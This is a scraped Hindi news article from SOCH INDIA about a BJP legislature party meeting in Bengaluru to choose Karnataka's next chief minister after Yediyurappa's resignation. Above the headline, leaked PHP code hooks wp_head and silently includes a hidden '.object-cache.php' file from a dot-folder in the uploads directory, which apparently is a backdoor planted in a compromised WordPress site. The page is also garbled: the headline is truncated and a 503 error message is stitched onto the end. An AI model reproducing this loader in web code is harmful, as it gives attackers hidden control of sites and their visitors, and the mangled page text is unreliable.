add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); गलुरु में आज शाम 7 बजे भाजपा विधायक दल की बैठक; किशन रेड्डी और धर्मेंद्र प्रधान पर्यवेक्षक बनाए गए – SOCH INDIA
Menu

देश
गलुरु में आज शाम 7 बजे भाजपा विधायक दल की बैठक; किशन रेड्डी और धर्मेंद्र प्रधान पर्यवेक्षक बनाए गए

nobanner

कर्नाटक को आज ही नया मुख्यमंत्री मिल सकता है। बीते दिन बीएस येदियुरप्पा के मुख्यमंत्री पद से इस्तीफे के बाद से ही नए मुख्यमंत्री के नाम को लेकर काफी चर्चा हो रही है। इसके बाद आज शाम 7 बजे बेंगलुरु में भाजपा विधायक दल की बैठक होनी है।

केंद्रीय मंत्री धर्मेंद्र प्रधान और जी. किशन रेड्डी को भाजपा हाईकमान ने पर्यवेक्षक यानी ऑब्जर्वर बनाया है। इन्हीं की अगुवाई में बेंगलुरु में विधायक दल की बैठक होगी, जिसमें मुख्यमंत्री के नाम का ऐलान होगा।

सोमवार को येदियुरप्पा ने दिया इस्तीफा
इससे पहले येदियुरप्पा ने सोमवार को CM पद से इस्तीफा दे दिया था। इसी दिन राज्य में भाजपा सरकार के दो साल पूरे हुए हैं। इसी के साथ नए CM के दावेदारों की चर्चा होने लगी है। सूत्रों का कहना है कि नया मुख्यमंत्री लिंगायत समुदाय और विधायकों में से होगा। इस हिसाब से कर्नाटक के गृह मंत्री बसवराज बोम्मई और खनन मंत्री एमआर निरानी सबसे बड़े दावेदार हैं।

लिंगायत समुदाय से आते हैं येदियुरप्पा
येदियुरप्पा भी लिंगायत समुदाय से आते हैं। यह समुदाय 1990 से भाजपा का समर्थक रहा है। कर्नाटक की आबादी में इसका हिस्सा करीब 17% है। राज्य की 224 विधानसभा सीटों में से 90 से 100 सीटों पर लिंगायतों का प्रभाव है। इस वजह से नया मुख्यमंत्री इसी समुदाय से चुनना भाजपा के लिए मजबूरी के साथ मुफीद भी है।

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.